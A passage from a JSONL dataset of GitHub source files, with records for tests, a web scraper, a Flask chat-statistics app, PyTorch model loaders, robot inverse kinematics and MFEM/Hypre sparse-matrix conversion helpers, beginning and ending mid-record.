self.assertRaisesRegex(\n googet.Error, 'Sources keyword detected*'):\n self.install._AddFlags(self.flags + ['-sources'], branch)\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"google/glazier","sub_path":"glazier/lib/googet_test.py","file_name":"googet_test.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":1200,"dataset":"github-code","pt":"48"} +{"seq_id":"1320540995","text":"for key in html_dump.keys(): # For everything in html dump\n raw_html = html_dump[key] # The raw html.\n soup = BeautifulSoup(raw_html, 'html.parser') # Create html parser.\n text = soup.get_text() # The parsed html.\n\n linkdict = dict() # This is where the clean formatted data goes.\n linkdict['raw_html'] = str(raw_html) # Put in the raw html.\n linkdict['clean_html'] = str(text) # Put in the clean text.\n linkdict['link'] = str(key) # Put in the link for output.\n\n to_save_link_text[hash(key)] = linkdict","repo_name":"TimothyBruce/anwala.github.io","sub_path":"cs532-s19/assignments/A3/LaTeX/htmlCodeDump.py","file_name":"htmlCodeDump.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"41845724635","text":"from django.test import TestCase\nfrom .models import FriendRequest, User\n# Create your tests here.\n\ndef create_test_user(username='username'):\n return User.objects.create(username=username, password='password', email='email')\n\n\n\nclass UserModelTest(TestCase):\n\n def test_toggle_friend_request(self):\n #create and delete friend request from same person\n user1 = create_test_user()\n user2 = create_test_user('user2')\n friend_request = user1.toggle_friend_request(user2)\n self.assertIs(len(FriendRequest.objects.all()), 1)\n friend_request = user1.toggle_friend_request(user2)\n self.assertIs(len(FriendRequest.objects.all()), 0)\n \n \n def test_toggle_friend_request_from_two_users(self):\n #don't allow to create request if different user has already requested\n user1 = create_test_user()\n user2 = create_test_user('user2')\n friend_request = user1.toggle_friend_request(user2)\n friend_request = user2.toggle_friend_request(user1)\n self.assertIs(friend_request, False)\n\n def test_accept_friend_request(self):\n user1 = create_test_user()\n user2 = create_test_user('user2')\n friend_request = user2.toggle_friend_request(user1)\n \n self.assertIs(len(user1.friends.all()), 0)\n accept = user1.accept_friend_request(user2)\n self.assertIs(accept, True)\n self.assertIs(user1.friends.all().contains(user2), True)\n self.assertIs(user2.friends.all().contains(user1), True)\n accept = user1.accept_friend_request(user2)\n self.assertIs(accept, False)\n\n def test_remove_friend(self):\n user1 = create_test_user()\n user2 = create_test_user('user2')\n friend_request = user2.toggle_friend_request(user1)\n accept = user1.accept_friend_request(user2)\n self.assertIs(user1.friends.all().contains(user2), True)\n self.assertIs(user2.friends.all().contains(user1), True)\n user1.remove_friend(user2)\n self.assertIs(user1.friends.all().contains(user2), False)\n self.assertIs(user2.friends.all().contains(user1), False)\n\n \n\n","repo_name":"KacperKuznik/social-media-website","sub_path":"backend/users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72534194707","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os, re\nimport urllib, urllib2\nimport json\n\ndef _parseJokes(page = 1):\n \"\"\"\n get funny jokes from qiushibaike\n \"\"\"\n\n url_24 = \"http://www.qiushibaike.com/text/page/%d\" % page \n headers = { 'Connection': 'Keep-Alive', \n 'Accept': 'text/html, application/xhtml+xml, */*', \n 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', \n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'} \n\n req_24 = urllib2.Request(url_24,headers = headers) \n\n opener_24 = urllib2.urlopen(req_24) \n\n html_24 = opener_24.read()\n rex = '
(.*?)
' \n pattern = re.compile(rex, re.S)\n \n m_24 = re.findall(pattern, html_24)\n m_24 = [x.replace('\\n\\n', '\\n') for x in m_24]\n m_24 = [x.strip('\\n') for x in m_24]\n m_24 = [x.strip('
') for x in m_24]\n\n m_24 = [x.decode('utf-8') for x in m_24]\n \n return m_24\n\n\ndef updateJokes(page = 1):\n \"\"\"\n parse page=1's jokes and save into json\n \"\"\"\n if 'jokes.json' not in os.listdir('./story/joke'):\n os.mknod('./story/joke/jokes.json')\n total_jokes = {}\n else: \n with open('./story/joke/jokes.json', 'r') as f:\n total_jokes = json.load(f)\n picks = _parseJokes(page) # parse jokes\n\n with open('./story/joke/jokes.json', 'w') as f:\n new_keys = [x[:6] for x in picks]\n for i, new_key in enumerate(new_keys):\n total_jokes[new_key] = picks[i]\n \n json.dump(total_jokes, f, encoding = 'utf-8')\n\n\nif __name__ == \"__main__\":\n os.chdir('/home/zkr/pyWorkSpace/For_Majesty/reconstruct')\n updateJokes(1)\n\n","repo_name":"databatman/DataDog","sub_path":"src/parse/parse_joke.py","file_name":"parse_joke.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36124325832","text":"import math\r\n\r\n# constants\r\n\r\n# distance from ground to joint 2 (mm)\r\na_1 = 307.787\r\n\r\n# distance from joint 2 to joint 3 (mm)\r\na_2 = 168.742\r\n\r\n# distance from joint 3 to orbital joint 2 (mm)\r\na_3 = 286.176\r\n\r\n# distance from orbital joint 2 to orbital joint 3 (mm)\r\njoint_6_offset = 97.905\r\n\r\n# distance from orbital joint 3 to tool center point (TCP)\r\n# this will be input from the GUI (mm)\r\ntool_offset = 137.000\r\n\r\n# variables\r\ntheta_1 = 0\r\ntheta_2 = 0\r\ntheta_3 = 0\r\n\r\nthetas = [theta_1, theta_2, theta_3]\r\n\r\njoint_2_delta = 0\r\njoint_3_delta = 0\r\njoint_6_delta = 0\r\n\r\ndeltas = [joint_2_delta, joint_3_delta, joint_6_delta]\r\n\r\ndef cosine_law_angle(side_a, side_b, side_c):\r\n\tangle = math.acos((side_c**2 - side_a**2 - side_b**2) /\r\n\t\t\t\t\t\t(-2 * side_a * side_b))\r\n\treturn angle\r\n\r\ndef cosine_law_length(side_a, side_b, theta):\r\n\tlength = math.sqrt((side_a**2 + side_b**2) - \\\r\n\t\t\t\t\t\t(2 * side_a * side_b * math.cos(theta)))\r\n\treturn length\r\n\r\n\r\ndef to_coordinate(joint_2_origin_angle, joint_2_3_angle, joint_5_6_angle, x, y, z, approach):\r\n\r\n\tr_1 = math.sqrt(x**2 + z**2)\r\n\r\n\tphi_1 = math.atan(z / x)\r\n\tphi_2 = math.radians(90) - phi_1\r\n\r\n\tr_2 = cosine_law_length(r_1, a_1, phi_2)\r\n\r\n\tphi_3 = cosine_law_angle(a_1, r_2, r_1)\r\n\tphi_4 = cosine_law_angle(r_2, a_2, a_3)\r\n\r\n\tthetas[0] = math.radians(180) - (phi_3 + phi_4)\r\n\tthetas[1] = cosine_law_angle(a_2, a_3, r_2)\r\n\r\n\t# first revolute joint on x-z plane\r\n\tthetas[0] = round(math.degrees(thetas[0]), 2)\r\n\r\n\t# second revolute joint on x-z plane\r\n\tthetas[1] = round(math.degrees(thetas[1]), 2)\r\n\r\n\t# base joint - first revolute joint on x-y plane\r\n\tthetas[2] = round(math.degrees(math.asin(y / x)), 2)\r\n\r\n\tcalculate_deltas(\r\n\t\tjoint_2_origin_angle, joint_2_3_angle, joint_5_6_angle, thetas[0], thetas[1], thetas[2], approach)\r\n\r\ndef calculate_deltas(joint_2_origin_angle, joint_2_3_angle, joint_5_6_angle, theta_1, theta_2, theta_3, approach):\r\n\t# joint 2 always relative to vertical z which will never change.\r\n\t# theta_1 is now the new angle for joint 2 apply it to the current joint position\r\n\tdeltas[0] = theta_1 - joint_2_origin_angle\r\n\tdeltas[0] = round(deltas[0], 3)\r\n\r\n\t# joint 3 is relative to joint 2\r\n\t# take the required delta, subtract it from the current delta and apply it to the current joint position\r\n\tdeltas[1] = theta_2 - joint_2_3_angle\r\n\tdeltas[1] = round(deltas[1], 3)\r\n\r\n\t# joint 6 delta is going to depend on the approach that we want\r\n\t# if parallel or perpendicular to the ground plane, we can calculate it based on the vertical axis which will never change\r\n\tif approach == 'parallel':\r\n\t\tdeltas[2] = theta_2 - theta_1 - joint_5_6_angle - 90\r\n\telif approach == 'perpendicular':\r\n\t\tdeltas[2] = theta_2 - theta_1 - joint_5_6_angle\r\n\t\r\n\tdeltas[2] = round(deltas[2], 3)\r\n\r\n\treturn deltas[0], deltas[1], deltas[2]\r\n","repo_name":"jquahian/project_longbow","sub_path":"inverse_kin.py","file_name":"inverse_kin.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41660327002","text":"# -*- coding:utf-8 -*-\n\n\n# Given a sorted linked list, delete all duplicates such that each element appear only once.\r\n#\n# Example 1:\r\n#\n#\n# Input: 1->1->2\r\n# Output: 1->2\r\n#\n#\n# Example 2:\r\n#\n#\n# Input: 1->1->2->3->3\r\n# Output: 1->2->3\r\n#\n#\n\n\n# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def deleteDuplicates(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: ListNode\r\n \"\"\"\r\n t_point = head\r\n while t_point:\r\n while t_point.next and t_point.next.val == t_point.val:\r\n t_point.next = t_point.next.next\r\n t_point = t_point.next\r\n return head\r\n\n","repo_name":"bonfy/leetcode","sub_path":"solutions/0083-remove-duplicates-from-sorted-list/remove-duplicates-from-sorted-list.py","file_name":"remove-duplicates-from-sorted-list.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":548,"dataset":"github-code","pt":"48"} +{"seq_id":"19630862666","text":"from collections import deque\n\nfrom environment import *\nfrom NN import *\n\n\ndef main():\n pygame.init()\n fps=30\n fpsclock=pygame.time.Clock()\n SCREEN = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n agent = Agent(0, 0, 28, 0)\n \n epsilon = 1 # Epsilon-greedy algorithm in initialized at 1 meaning every step is random at the start\n max_epsilon = 1 # You can't explore more than 100% of the time\n min_epsilon = 0.01 # At a minimum, we'll always explore 1% of the time\n decay = 0.01\n\n replay_memory = deque(maxlen=1_000)\n\n # Main Model (updated every 4 steps)\n model = neural_net((99,), 8)\n\n # Target Model (updated every 100 steps)\n target_model = neural_net((99,), 8)\n target_model.set_weights(model.get_weights())\n\n steps_to_update_target_model = 0\n\n for episode in range(300):\n episode_time_limit = time.time()\n object_spawn_interval = time.time()\n grid = make_grid(ROWS, COLUMNS, WIN_WIDTH)\n agent.score = 0\n done = False\n while not done:\n steps_to_update_target_model += 1\n\n exp_prob = np.random.rand()\n if exp_prob <= epsilon:\n #explore\n action = np.random.choice(agent.actions)\n else:\n #exploit\n curr_state = feature_extractor(grid, agent)\n print('Exploiting')\n prediction = model.predict(np.array([curr_state]))\n action = np.argmax(prediction)\n \n new_state, reward, done, object_spawn_interval = step(agent, action, grid, object_spawn_interval, episode_time_limit)\n \n object_spawn_interval = object_spawn_interval\n\n\n grid = draw(SCREEN, new_state, ROWS, COLUMNS, WIN_WIDTH, WIN_HEIGHT)\n agent.draw(SCREEN)\n pygame.display.update()\n fpsclock.tick(fps)\n\n replay_memory.append([grid, agent, action, reward, new_state, done]) #grid == state\n\n if steps_to_update_target_model % 4 == 0 or done:\n history = train(replay_memory, model, target_model, done)\n \n grid = new_state\n agent.score += reward\n\n\n if done:\n print('Total training rewards: {} after n steps = {} with final reward = {}'.format(agent.score, episode, reward))\n \n\n if steps_to_update_target_model >= 100:\n print('Copying main network weights to the target network weights')\n target_model.set_weights(model.get_weights())\n steps_to_update_target_model = 0\n break\n\n epsilon = min_epsilon + (max_epsilon - min_epsilon) * np.exp(-decay * episode)\n\n return model, history\n\nif __name__ == '__main__':\n main()","repo_name":"Gift-py/DQN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29097010181","text":"#!/usr/bin/python3\n\"\"\"Rectangle class Module\"\"\"\nBaseGeometry = __import__('7-base_geometry').BaseGeometry\n\n\nclass Rectangle(BaseGeometry):\n \"\"\"\n Rectangle class inheriting from BaseGeometry\n\n Attributes:\n width: int > 0\n height: int > 0\n \"\"\"\n def __init__(self, width, height):\n \"\"\"Rectangle initializer\"\"\"\n self.integer_validator(\"width\", width)\n self.__width = width\n self.integer_validator(\"height\", height)\n self.__height = height\n","repo_name":"SifaKasena/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/8-rectangle.py","file_name":"8-rectangle.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18001470403","text":"from flask import *\nfrom collections import OrderedDict\nfrom datetime import datetime, timedelta\n\nmain = Blueprint('main', __name__, template_folder='templates')\n\n# Update number of posts stats\ndef calcPostStats(author, stats):\n\n if author in stats:\n stats[author] += 1\n else:\n stats[author] = 1\n\n# Update number of words stats\ndef calcWordStats(author, message, stats):\n\n if author not in stats:\n stats[author] = 0\n\n # Add one word for image/video post\n if \"<\" in message:\n stats[author] += 1\n\n for _ in message:\n stats[author] += 1\n\n# Update number of media stats\ndef calcMediaStats(author, message, stats):\n\n if author not in stats:\n stats[author] = 0\n\n if \"<\" in message:\n stats[author] += 1\n\ndef parseMessage(line, chat, metric, stats):\n split = line.split(\":\")\n\n if len(split) < 5:\n return False\n\n date = line.split(\",\")[0]\n timestamp = line.split(\"M:\")[0].split(\", \")[1]\n\n author = split[3][1:]\n message = split[4][1:]\n\n if metric == \"posts\":\n calcPostStats(author, stats)\n\n elif metric == \"words\":\n calcWordStats(author, message, stats)\n\n elif metric == \"media\":\n calcMediaStats(author, message, stats)\n\n chat[\"author\"] = author\n chat[\"message\"] = message\n chat[\"date\"] = date\n chat[\"timestamp\"] = timestamp + \"M\"\n\n return True\n\n# If date range is set, checks if message falls within range\ndef validMessageDate(line, beginDate):\n split = line.split(\":\")\n\n if len(split) < 5:\n return False\n\n date = line.split(\",\")[0]\n splitDate = date.split(\"/\")\n\n dateTime = datetime(int('20' + splitDate[2]), int(splitDate[0]), int(splitDate[1]))\n\n if dateTime < beginDate:\n return False\n\n return True\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef main_route():\n options = {}\n\n if request.method == 'GET':\n return render_template(\"home.html\")\n\n elif request.method == 'POST':\n\n if request.files['file'].filename == '':\n options['message'] = \"No File\"\n\n return render_template(\"home.html\", **options)\n\n chats = []\n stats = {}\n rangeSet = False\n\n metric = request.form['metric']\n file = request.files['file']\n timeUnit = request.form['time-unit']\n\n # Check if time range is set\n if timeUnit != \"all\":\n rangeSet = True\n\n now = datetime.now()\n timeNumber = int(request.form['time-number'])\n\n # Determine beginning range for date\n if timeUnit == \"year\":\n timeDelta = timedelta(days=365*timeNumber)\n\n elif timeUnit == \"month\":\n timeDelta = timedelta(days=30*timeNumber)\n\n else:\n timeDelta = timedelta(weeks=timeNumber)\n\n beginDate = now - timeDelta\n\n numChats = 0\n for line in file.readlines():\n chat = {}\n line = line.decode('utf-8')\n\n if rangeSet:\n if not validMessageDate(line, beginDate):\n continue\n\n if parseMessage(line, chat, metric, stats):\n chats.append(chat)\n numChats += 1\n\n stats = OrderedDict(sorted(stats.items(), key=lambda x: x[1], reverse=True))\n\n options['message'] = \"Success\"\n options['stats'] = stats\n\n return render_template(\"stats.html\", **options)\n","repo_name":"jonah18/whatstats","sub_path":"controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13160177954","text":"import numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.distributions.normal import Normal\r\n\r\n\r\nclass NoisyActivation(nn.Module):\r\n \"\"\"\r\n new method to pre-process the training data\r\n \"\"\"\r\n\r\n def __init__(self, shape, device, upper_bound, threshold):\r\n super(NoisyActivation, self).__init__()\r\n self.shape = shape\r\n self.device = device\r\n self.upper_bound = upper_bound\r\n self.threshold = threshold\r\n self.mus = nn.Parameter(nn.init.normal_(torch.empty(self.shape, device=self.device), 0, 0.2))\r\n self.rhos = nn.Parameter(nn.init.normal_(torch.empty(self.shape, device=self.device), 0, 1))\r\n self.sigma = (1 + torch.tanh(self.rhos)) / 2 * self.upper_bound\r\n\r\n self.normal = Normal(0, 1)\r\n\r\n def forward(self, x):\r\n \"\"\"\r\n :param x: input\r\n :return:\r\n \"\"\"\r\n self.sigma = (1 + torch.tanh(self.rhos)) / 2 * self.upper_bound\r\n noise = self.sigma * (self.normal.sample(self.shape).to(self.device)) + self.mus\r\n return x + noise\r\n\r\n def inner_loss(self):\r\n \"\"\"\r\n return -log((1/n)*\\\\sum{sigma**2})\r\n \"\"\"\r\n return -torch.log(1 / np.prod(self.shape) * torch.sum(torch.pow(self.sigma, 2)))\r\n\r\n\r\ndef get_model(model_index, num_classes):\r\n \"\"\"\r\n get PyTorch models\r\n\r\n :param model_index: from 0 to 37\r\n :param num_classes:\r\n 0 alexnet\r\n 1 DenseNet121\r\n 2 DenseNet161\r\n 3 DenseNet169\r\n 4 DenseNet201\r\n 5 ge_resnext29_8x64d\r\n 6 ge_resnext29_16x64d\r\n 7 google_net\r\n 8 lenet\r\n 9 preresnet20\r\n 10 preresnet32\r\n 11 preresnet44\r\n 12 preresnet56\r\n 13 preresnet110\r\n 14 preresnet1202\r\n 15 RegNetX_200MF\r\n 16 RegNetX_400MF\r\n 17 RegNetY_400MF\r\n 18 resnet20\r\n 19 resnet32\r\n 20 resnet44\r\n 21 resnet56\r\n 22 resnet110\r\n 23 resnet1202\r\n 24 ResNeXt29_2x64d\r\n 25 ResNeXt29_4x64d\r\n 26 ResNeXt29_8x64d\r\n 27 ResNeXt29_32x4d\r\n 28 se_resnext29_8x64d\r\n 29 se_resnext29_16x64d\r\n 30 sk_resnext29_16x32d\r\n 31 sk_resnext29_16x64d\r\n 32 vgg11\r\n 33 vgg13\r\n 34 vgg16\r\n 35 vgg19\r\n \"\"\"\r\n model = None\r\n model_name = None\r\n try:\r\n if model_index == 0:\r\n from models.alexnet import alexnet\r\n model = alexnet(num_classes)\r\n model_name = 'alexnet'\r\n elif model_index == 1:\r\n from models.densenet import DenseNet121\r\n model = DenseNet121(num_classes)\r\n model_name = 'DenseNet121'\r\n elif model_index == 2:\r\n from models.densenet import DenseNet161\r\n model = DenseNet161(num_classes)\r\n model_name = 'DenseNet161'\r\n elif model_index == 3:\r\n from models.densenet import DenseNet169\r\n model = DenseNet169(num_classes)\r\n model_name = 'DenseNet169'\r\n elif model_index == 4:\r\n from models.densenet import DenseNet201\r\n model = DenseNet201(num_classes)\r\n model_name = 'DenseNet201'\r\n elif model_index == 5:\r\n from models.genet import ge_resnext29_8x64d\r\n model = ge_resnext29_8x64d(num_classes)\r\n model_name = 'ge_resnext29_8x64d'\r\n elif model_index == 6:\r\n from models.genet import ge_resnext29_16x64d\r\n model = ge_resnext29_16x64d(num_classes)\r\n model_name = 'ge_resnext29_16x64d'\r\n elif model_index == 7:\r\n from models.googlenet import google_net\r\n model = google_net(num_classes)\r\n model_name = 'google_net'\r\n elif model_index == 8:\r\n from models.lenet import lenet\r\n model = lenet(num_classes)\r\n model_name = 'lenet'\r\n elif model_index == 9:\r\n from models.preresnet import preresnet20\r\n model = preresnet20(num_classes)\r\n model_name = 'preresnet20'\r\n elif model_index == 10:\r\n from models.preresnet import preresnet32\r\n model = preresnet32(num_classes)\r\n model_name = 'preresnet32'\r\n elif model_index == 11:\r\n from models.preresnet import preresnet44\r\n model = preresnet44(num_classes)\r\n model_name = 'preresnet44'\r\n elif model_index == 12:\r\n from models.preresnet import preresnet56\r\n model = preresnet56(num_classes)\r\n model_name = 'preresnet56'\r\n elif model_index == 13:\r\n from models.preresnet import preresnet110\r\n model = preresnet110(num_classes)\r\n model_name = 'preresnet110'\r\n elif model_index == 14:\r\n from models.preresnet import preresnet1202\r\n model = preresnet1202(num_classes)\r\n model_name = 'preresnet1202'\r\n elif model_index == 15:\r\n from models.regnet import RegNetX_200MF\r\n model = RegNetX_200MF(num_classes)\r\n model_name = 'RegNetX_200MF'\r\n elif model_index == 16:\r\n from models.regnet import RegNetX_400MF\r\n model = RegNetX_400MF(num_classes)\r\n model_name = 'RegNetX_400MF'\r\n elif model_index == 17:\r\n from models.regnet import RegNetY_400MF\r\n model = RegNetY_400MF(num_classes)\r\n model_name = 'RegNetY_400MF'\r\n elif model_index == 18:\r\n from models.resnet import resnet20\r\n model = resnet20(num_classes)\r\n model_name = 'resnet20'\r\n elif model_index == 19:\r\n from models.resnet import resnet32\r\n model = resnet32(num_classes)\r\n model_name = 'resnet32'\r\n elif model_index == 20:\r\n from models.resnet import resnet44\r\n model = resnet44(num_classes)\r\n model_name = 'resnet44'\r\n elif model_index == 21:\r\n from models.resnet import resnet56\r\n model = resnet56(num_classes)\r\n model_name = 'resnet56'\r\n elif model_index == 22:\r\n from models.resnet import resnet110\r\n model = resnet110(num_classes)\r\n model_name = 'resnet110'\r\n elif model_index == 23:\r\n from models.resnet import resnet1202\r\n model = resnet1202(num_classes)\r\n model_name = 'resnet1202'\r\n elif model_index == 24:\r\n from models.resnext import ResNeXt29_2x64d\r\n model = ResNeXt29_2x64d(num_classes)\r\n model_name = 'ResNeXt29_2x64d'\r\n elif model_index == 25:\r\n from models.resnext import ResNeXt29_4x64d\r\n model = ResNeXt29_4x64d(num_classes)\r\n model_name = 'ResNeXt29_4x64d'\r\n elif model_index == 26:\r\n from models.resnext import ResNeXt29_8x64d\r\n model = ResNeXt29_8x64d(num_classes)\r\n model_name = 'ResNeXt29_8x64d'\r\n elif model_index == 27:\r\n from models.resnext import ResNeXt29_32x4d\r\n model = ResNeXt29_32x4d(num_classes)\r\n model_name = 'ResNeXt29_32x4d'\r\n elif model_index == 28:\r\n from models.senet import se_resnext29_8x64d\r\n model = se_resnext29_8x64d(num_classes)\r\n model_name = 'se_resnext29_8x64d'\r\n elif model_index == 29:\r\n from models.senet import se_resnext29_16x64d\r\n model = se_resnext29_16x64d(num_classes)\r\n model_name = 'se_resnext29_16x64d'\r\n elif model_index == 30:\r\n from models.sknet import sk_resnext29_16x32d\r\n model = sk_resnext29_16x32d(num_classes)\r\n model_name = 'sk_resnext29_16x32d'\r\n elif model_index == 31:\r\n from models.sknet import sk_resnext29_16x64d\r\n model = sk_resnext29_16x64d(num_classes)\r\n model_name = 'sk_resnext29_16x64d'\r\n elif model_index == 32:\r\n from models.vgg import vgg11\r\n model = vgg11(num_classes)\r\n model_name = 'vgg11'\r\n elif model_index == 33:\r\n from models.vgg import vgg13\r\n model = vgg13(num_classes)\r\n model_name = 'vgg13'\r\n elif model_index == 34:\r\n from models.vgg import vgg16\r\n model = vgg16(num_classes)\r\n model_name = 'vgg16'\r\n elif model_index == 35:\r\n from models.vgg import vgg19\r\n model = vgg19(num_classes)\r\n model_name = 'vgg19'\r\n except IndexError:\r\n print('IndexError: model_index should ba an integar between 0 to 35.')\r\n return model, model_name\r\n","repo_name":"AISIGSJTU/Themis","sub_path":"load_models.py","file_name":"load_models.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30687696092","text":"from __future__ import print_function\n\n#\n# this modules works only with parallel version\n#\nimport sys\nimport numpy as np\n\n\ndef get_assumed_patitioning(m):\n '''\n for given size of row, returns proper patitioning\n '''\n from mpi4py import MPI\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n min_nrows = m // num_proc\n extra_rows = m % num_proc\n start_row = min_nrows * myid + (extra_rows if extra_rows < myid else myid)\n end_row = start_row + min_nrows + (1 if extra_rows > myid else 0)\n nrows = end_row - start_row\n\n return start_row, end_row, nrows\n\n\ndef get_row_partitioning(M):\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n m = M.GetNumRows()\n m_array = comm.allgather(m)\n rows = [0] + list(np.cumsum(m_array))\n return rows\n\n\ndef get_col_partitioning(M):\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n m = M.GetNumCols()\n m_array = comm.allgather(m)\n rows = [0] + list(np.cumsum(m_array))\n return rows\n\n\ndef ToHypreParVec(vec):\n import mfem.par as mfem\n from mpi4py import MPI\n\n if mfem.sizeof_HYPRE_Int() == 4:\n dtype = 'int32'\n else:\n dtype = 'int64'\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n vec = vec.flatten()\n ml = vec.shape[0]\n\n # collect col array to determin partitioning\n m_array = comm.allgather(ml)\n cols = [0] + list(np.cumsum(m_array))\n glob_size = cols[-1]\n col_starts = np.array([cols[myid], cols[myid+1], glob_size], dtype=dtype)\n\n vec = vec.astype('float', copy=False)\n v = mfem.HypreParVector(MPI.COMM_WORLD,\n glob_size, [vec, col_starts])\n\n return v\n\n\ndef ToHypreParCSR(mat, check_partitioning=False, verbose=False,\n col_starts=None, assert_non_square_no_col_starts=True):\n '''\n convert scipy sparse matrix to hypre\n\n vertically stack csr matrix to generte HYPRE Par CSR\n\n Note:\n row partitioning is inferred from distribution of input matrix.\n column patitioning needs to be specified col_starts.\n\n If col_starts is not given, column partitioning is chosen \n to be the same as row partitioning. This works if matrix is square (M = N).\n\n For an aribtrary rectangular matrix, the column partitioning can be\n different from the row partitioning. For example, MFEM mixedbilinearfomr \n uses different partitiong rules for row and column.\n\n ToDo: change default assert_non_square_no_col_starts to False\n\n '''\n\n from mpi4py import MPI\n import mfem.par as mfem\n\n if mfem.sizeof_HYPRE_Int() == 4:\n dtype = 'int32'\n else:\n dtype = 'int64'\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n def verbose_message(m, n, nrows, i, j, data, row_starts, col_starts):\n for k in range(num_proc):\n MPI.COMM_WORLD.Barrier()\n if myid == k:\n print('MyID : ', k)\n print((m, n), nrows, len(data), i, j,\n data, row_starts, col_starts)\n print('NNZ', np.sum(data != 0.0))\n MPI.COMM_WORLD.Barrier()\n\n from scipy.sparse import csr_matrix\n\n if isinstance(mat, csr_matrix):\n mat = mat.astype('float')\n ml, nl = mat.shape\n n_array = comm.allgather(nl)\n else:\n raise ValueError(\"Import Matrix Format should be csr or None\")\n\n # collect row array to determin the size of matrix\n m_array = comm.allgather(ml)\n\n rows = [0] + list(np.cumsum(m_array))\n m = rows[-1]\n #row_starts = np.array([rows[myid], rows[myid+1], m], dtype=dtype)\n row_starts = np.array([rows[myid], rows[myid+1]], dtype=dtype)\n\n n = nl\n nrows = ml\n\n i = mat.indptr.astype(dtype)\n j = mat.indices.astype(dtype)\n data = mat.data\n\n if col_starts is None and m != nl:\n col_starts = get_assumed_patitioning(nl)\n if assert_non_square_no_col_starts:\n assert False, \"col_starts must be specified for non diagonal array\"\n if col_starts is None:\n col_starts = row_starts.copy()\n # col_starts[-1]=n\n if col_starts[0] > n:\n col_starts[0] = n\n if col_starts[1] > n:\n col_starts[1] = n\n #col_starts[2] = n\n else:\n # make sure that dtype is right....\n col_starts = np.array(col_starts, dtype=dtype)\n if check_partitioning:\n ch = get_assumed_patitioning(m)\n if (row_starts[0] != ch[0] or\n row_starts[1] != ch[1] or\n nrows != ch[2]):\n for k in range(num_proc):\n MPI.COMM_WORLD.Barrier()\n if myid == k:\n print('MyID : ', k)\n print(ch, nrows, row_starts, col_starts)\n print('NNZ', np.sum(data != 0.0))\n MPI.COMM_WORLD.Barrier()\n raise ValueError(\"partitioning of input matrix is not correct\")\n if verbose:\n verbose_message(m, n, nrows, i, j, data, row_starts, col_starts)\n\n #\n # it seems row_starts and col_starts are both to determin\n # which part is treated diagnal element.\n #\n if (m == n and row_starts[0] == col_starts[0] and\n row_starts[1] == col_starts[1]):\n # this will cause hypre_CSRMatrixReorder call.\n M = mfem.HypreParMatrix(MPI.COMM_WORLD,\n nrows,\n m, n, [i, j,\n data, col_starts])\n M.CopyRowStarts()\n M.CopyColStarts()\n else:\n M = mfem.HypreParMatrix(MPI.COMM_WORLD,\n nrows,\n m, n, [i, j,\n data, row_starts[:2], col_starts[:2]])\n M.CopyRowStarts()\n M.CopyColStarts()\n return M\n\n\ndef ToScipyCSR(mat):\n '''\n convert HypreParCSR to Scipy CSR Matrix\n '''\n import mfem.par as mfem\n merged = mfem.SparseMatrix()\n mat.MergeDiagAndOffd(merged)\n\n from scipy.sparse import csr_matrix\n P = csr_matrix((merged.GetDataArray(), merged.GetJArray(), merged.GetIArray()),\n shape=(merged.Height(), merged.Width()))\n P._linked_mat = merged\n return P\n\n\ndef ToScipyCoo(mat):\n '''\n convert HypreParCSR to Scipy Coo Matrix\n '''\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = mat.GetCooDataArray()\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n = jupper - jlower + 1\n n = mat.N()\n\n from scipy.sparse import coo_matrix\n try:\n return coo_matrix((data, (irn-ilower, jcn)), shape=(m, n))\n except:\n print(\"wrong input\")\n print(num_rows, ilower, iupper, jlower, jupper)\n print(np.min(irn-ilower), np.max(irn-ilower),\n np.min(jcn), np.max(jcn), (m, n))\n raise\n\n\ndef InnerProductComplex(A, B):\n def 